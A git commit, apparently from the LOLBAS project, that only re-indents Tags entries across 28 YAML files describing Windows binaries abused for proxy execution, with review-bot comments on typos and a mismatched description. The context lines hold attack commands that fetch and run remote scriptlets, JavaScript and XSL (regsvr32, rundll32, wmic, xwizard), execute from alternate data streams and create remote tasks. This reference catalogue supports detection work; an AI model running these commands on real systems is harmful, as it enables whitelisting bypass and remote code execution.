Correct indentation

This commit is contained in:
Hegusung 2024-10-13 17:57:36 +02:00
parent 6375a4a338
commit 75d04eaf72
28 changed files with 54 additions and 54 deletions

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: XBAP
- Execute: XBAP
- Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
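Review bot: the removed and added `- Execute: XBAP` lines render identically here, so this hunk (like the rest of the commit) is a whitespace-only change to the Tags list; this is exactly the drift a yamllint indentation rule in CI would have caught, and adding that check alongside the fix would stop it recurring. Separately, the OperatingSystem context line spells the product "Windows vista" while every other name in the list is capitalised; "Windows Vista" would be consistent, and the same casing recurs in the other files touched by this commit.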

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: CMD
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\provlaunch.exe
Detection:

View File

@ -12,8 +12,8 @@ Commands:
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -22,7 +22,7 @@ Commands:
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: SCT
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@ -31,8 +31,8 @@ Commands:
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
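Review bot: this hunk's Command, Description and Usecase lines repeat the -12 hunk above verbatim (`regsvr32.exe /s /u /i:file.sct scrobj.dll`, "Execute the specified local .SCT script with scrobj.dll."), so from the visible context the entry reads as a duplicate; if it is meant to be a distinct variant (for instance the SysWOW64 copy listed under Full_Path further down), the Description should say what differs, otherwise the entry should be dropped in a follow-up.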
@ -41,7 +41,7 @@ Commands:
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: SCT
Full_Path:
- Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe

View File

@ -30,7 +30,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution
@ -39,7 +39,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution
@ -48,7 +48,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet
@ -57,7 +57,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Execute: JScript
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\runexehelper.exe
Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Powershell
- Execute: Powershell
Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
Description: Modifies an existing service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
@ -21,7 +21,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
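Review bot: the Usecase context line in this hunk has a doubled word, "relative to the the time of creation"; worth correcting while the file is being touched, though in a separate commit since this one is whitespace-only.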
@ -21,7 +21,7 @@ Commands:
MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@ -21,8 +21,8 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: CMD
- Execute: Remote
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\setres.exe
Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: EXE
- Execute: EXE
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\SettingSyncHost.exe
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019
Tags:
- Execute: EXE
- Execute: EXE
- Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -21,7 +21,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe
Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- Execute: EXE
- Execute: EXE
- Command: stordiag.exe
Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
Usecase: Possible defence evasion purposes.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\stordiag.exe
- Path: c:\windows\syswow64\stordiag.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Tags:
- Execute: Powershell
- Execute: Powershell
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 10 2004 and above, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
@ -21,7 +21,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 10 1909 and below
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 10 1809 and newer, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: TTTracer.exe -dumpFull -attach pid
Description: Dumps process using tttracer.exe. Requires administrator privileges
Usecase: Dump process by PID

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\unregmp2.exe
- Path: C:\Windows\SysWOW64\unregmp2.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.012
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe

View File

@ -12,8 +12,8 @@ Commands:
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: EXE
- Execute: Remote
- Execute: EXE
- Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\wlrmdr.exe
Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: wmic.exe process call create calc
Description: Execute calc from wmic
Usecase: Execute binary from wmic to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system
@ -30,8 +30,8 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: Remote
- Execute: EXE
- Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system
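Review bot: the Description context line in this hunk ("Create a volume shadow copy of NTDS.dit that can be copied.") does not describe the Command directly above it, which runs `wmic.exe process get brief /format:` against a remote XSL stylesheet, and the Usecase ("Execute binary on remote system") does not match it either. This looks like a copy-paste error in the entry rather than something the indentation pass should leave in place; suggest a follow-up that aligns Description and Usecase with the XSL-execution behaviour the next hunk describes.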
@ -40,8 +40,8 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: XSL
- Execute: Remote
- Execute: XSL
- Execute: Remote
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Usecase: Execute script from remote system
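Review bot: the Description context line misspells "stylesheet" as "stylsheet"; a one-word fix for a follow-up commit.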

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\WorkFolders.exe
Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: DLL
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: DLL
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet

View File

@ -28,7 +28,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: CMD
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml
Acknowledgement:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@ -30,7 +30,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@ -39,7 +39,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Detection:
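Review bot: the Full_Path context line pins the WebView2 binary to a specific Edge build (`114.0.1823.43`), which will be stale on any host running a newer release and makes the path unreliable for detection content built from this entry; the wt.exe entry later in this commit uses a `<version_packageid>` placeholder for the same situation, and following that convention here would keep the path accurate.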

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
Detection: